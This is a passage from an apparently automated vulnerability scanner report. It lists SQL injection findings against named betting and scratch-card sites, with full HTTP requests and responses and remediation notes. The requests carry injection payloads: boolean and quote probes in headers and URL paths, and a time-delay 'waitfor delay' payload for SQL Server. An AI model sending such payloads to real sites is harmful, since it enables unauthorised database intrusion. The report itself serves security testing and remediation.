Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:11 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:10 GMT
Connection: close
Content-Length: 102693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/7th-Heaven">Let seven be your lucky number, play 7th Heaven!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView('casino
...[SNIP]...

Request 2

GET /en/Sports/Bowling HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17123380'%20or%201%3d2--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:12 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:12 GMT
Connection: close
Content-Length: 102706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGam
...[SNIP]...

1.5. https://scratch.betsson.com/en/Sports/World-Champions [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Sports/World-Champions

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. As with the other Tentative findings on this host, the visible difference between the two responses is the rotating promotional link (Slot-Super-7 versus 3-Wow) and a 13-byte change in Content-Length (102686 versus 102699); the new PartnerId cookie is set identically in both responses regardless of the Referer value.

Request 1

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:34 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:34 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:33 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGameView(
...[SNIP]...

Request 2

GET /en/Sports/World-Champions HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerId=hgjeap65; domain=.betsson.com; expires=Wed, 15-Jun-2011 11:53:35 GMT; path=/
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:35 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:34 GMT
Connection: close
Content-Length: 102699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Sports" />
<meta name="WT.cg_s" content="Startpage_Sports" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="activeViewBtnOuter" onclick="ToggleGameView('sports','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Sports');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="To
...[SNIP]...

1.6. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /images/games_ENG.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The warning is emitted on the 404 page itself (mysql_fetch_array() in /home/scratch/public_html/includes/functions.php on line 424), which shows that the path segment is used in a database lookup even for a resource that does not exist, and that the query fails when the segment contains an unescaped quote.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. Suppressing the warning only hides the symptom: the URL path segments should be passed to the database as bound parameters of a prepared statement rather than concatenated into the query string, and the failed-query path in functions.php should be checked for the same pattern wherever else it is called.

Request 1

GET /images'/games_ENG.swf HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:08 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:08 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /images''/games_ENG.swf HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:09 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.7. http://scratch.co.uk/images/games_ENG.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /images/games_ENG.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The same mysql_fetch_array() warning from functions.php line 424 appears here as for parameter 1, so both path segments reach the same unescaped query.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. As with the previous finding, the underlying fix is to bind the path segments as parameters of a prepared statement rather than concatenating them into the SQL string; hiding the warning alone leaves the injection in place.

Request 1

GET /images/games_ENG.swf' HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:30 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:30 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9685

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /images/games_ENG.swf'' HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 9501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.8. http://scratch.co.uk/resources/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /resources/style.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources'/style.css HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:33 GMT; path=/
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /resources''/style.css HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:34 GMT; path=/
Content-Type: text/html
Content-Length: 9501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.9. http://scratch.co.uk/resources/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /resources/style.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources/style.css' HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:00 GMT; path=/
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /resources/style.css'' HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:30:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:02 GMT; path=/
Content-Type: text/html
Content-Length: 9608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.10. http://trk.primescratchcards.com/ [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.primescratchcards.com
Path:   /

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the ac parameter. The application took 21463 milliseconds to respond to the request, compared with 202 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /?ac=51waitfor%20delay'0%3a0%3a20'--&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
